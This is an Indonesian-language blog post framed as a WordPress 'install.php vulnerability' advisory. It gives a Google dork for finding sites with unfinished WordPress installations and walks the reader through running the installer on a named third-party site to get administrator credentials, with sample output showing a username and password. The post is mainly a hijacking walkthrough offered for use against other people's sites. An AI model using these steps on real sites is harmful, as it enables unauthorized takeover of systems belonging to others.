WordPress instal.php vulnerability
[+] : Thank's To : Jundab
[+] : Software Link : www.wordpress.org/latest.zip
[+] : Version : Semua Versi untuk WordPress
[+] : Tasted On : Windows Xp, Puppy Knop fs 5
[+] : Google Dork : inurl:wordpress/wp-admin/install.php?step=1
[+] : Code : 127.0.0.1/path/wp-admin/install.php
[-] Cari target : inurl:wordpress/wp-admin/install.php?step=1——————————————————————–
misal target udah dapet
http://www.itsmynews.com/blog/wp-admin/install.php?step=1akan muncul kotak login yaitu webblog title dan your email
Webblog title : isi dengan judul blog wordpress tersebut misal
your email : isi dengan sembarang email yang masih aktif
lalu klik “continue to second step >>”
lalu akan muncul :
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 'wp_user_level', '10')' at line 1]
INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (, ‘wp_user_level’, ’10′);
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')' at line 1]
INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (, ‘wp_capabilities’, ‘a:1:{s:13:”administrator”;b:1;}’);
Finished!
Now you can log in with the username “admin” and password “5432ce”.
Note that password carefully! It is a random password that was generated just for you. If you lose it, you will have to delete the tables from the database yourself, and re-install WordPress. So to review:
Username
admin
Password
5432ce
Login address
wp-login.php
Were you expecting more steps? Sorry to disappoint. All done!
kemudian lihat bagian paling bawah sendiri maka akan tercantum username dan password nya.
Username*jika wordpress belum terinsal maka insal dahulu
admin
Password
5432ce
Login address
wp-login.php
127.0.0.1/wp-admin/install.php?step=1
No comments:
Post a Comment